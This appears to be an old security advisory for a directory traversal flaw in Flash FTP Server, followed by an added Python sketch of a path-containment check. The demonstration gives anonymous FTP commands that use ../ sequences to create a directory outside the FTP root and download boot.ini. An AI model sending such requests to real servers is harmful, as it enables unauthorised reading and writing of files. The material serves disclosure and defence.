Flash FTP server v1.0 for Windows directory traversal vulnerability - Allows remote anonymous users to read and write to any file on the system.
Flash Ftp server 1.0 Directory traversal
Release Date:
January 1, 2004
Systems Affected:
Flash FTP Server is a powerful, flexible, and easy-to-set-up FTP server for all Windows
platforms. Some bugs were found that will allow a malicious user to write and read anywhere
on the disk.
Demonstration:
--------------
[1]
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
pwd
257 "/C:/ftp_root/" is current directory.
mkd /../../../../../../../owned
257 'C:\..\..\..\..\..\..\..\owned': directory created.
[2]
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
ftp> get /../../../../../../../../boot.ini
Suggestions:
Allow only trusted users access to systems. Log creation of files/directories on systems
to identify malicious users.
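
Added example, not part of the original advisory and not Flash FTP Server's own code: a Python sketch of the server-side check that keeps the paths from the demonstration inside the FTP root. The function names (naive_map, is_within, safe_map) are hypothetical, and the vulnerable join in naive_map is an assumed pattern, not the product's actual logic.

```python
import ntpath
import posixpath

FTP_ROOT = "C:\\ftp_root"  # root directory from the PWD reply in the demonstration


def naive_map(root, client_path):
    # Assumed vulnerable pattern: join the client's path to the root unchecked.
    rel = client_path.lstrip("/").replace("/", "\\")
    return ntpath.normpath(ntpath.join(root, rel))


def is_within(root, local):
    # True if local is the root itself or lies beneath it (case-insensitive).
    root_n = ntpath.normcase(ntpath.normpath(root))
    local_n = ntpath.normcase(ntpath.normpath(local))
    return local_n == root_n or local_n.startswith(root_n + "\\")


def safe_map(root, cwd, client_path):
    """Map an FTP path to a local path under root; None means refuse."""
    # Backslashes are separators on Windows, so treat them like "/".
    client_path = client_path.replace("\\", "/")
    # Refuse NUL bytes, drive letters and alternate data streams outright.
    if "\x00" in client_path or ":" in client_path:
        return None
    # Resolve "." and ".." inside the virtual tree; ".." at "/" stays at "/".
    virtual = posixpath.normpath(posixpath.join("/", cwd, client_path))
    parts = [p for p in virtual.split("/") if p]
    local = ntpath.normpath(ntpath.join(root, *parts))
    # Defence in depth: re-check containment after mapping.
    return local if is_within(root, local) else None


if __name__ == "__main__":
    requests = (
        "/../../../../../../../owned",        # path from demonstration [1]
        "/../../../../../../../../boot.ini",  # path from demonstration [2]
        "..\\..\\owned", "C:\\boot.ini", "/pub/file.txt",  # constructed samples
    )
    for req in requests:
        naive = naive_map(FTP_ROOT, req)
        print(f"{req!r}: naive={naive!r} "
              f"escapes={not is_within(FTP_ROOT, naive)} "
              f"safe={safe_map(FTP_ROOT, '/', req)!r}")
```

Resolving ".." in the virtual tree before mapping clamps the request at the FTP root, and the containment re-check catches anything the first step misses.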
Patch:
Not yet available
Credit:
dr_insane
http://members.lycos.co.uk/r34ct/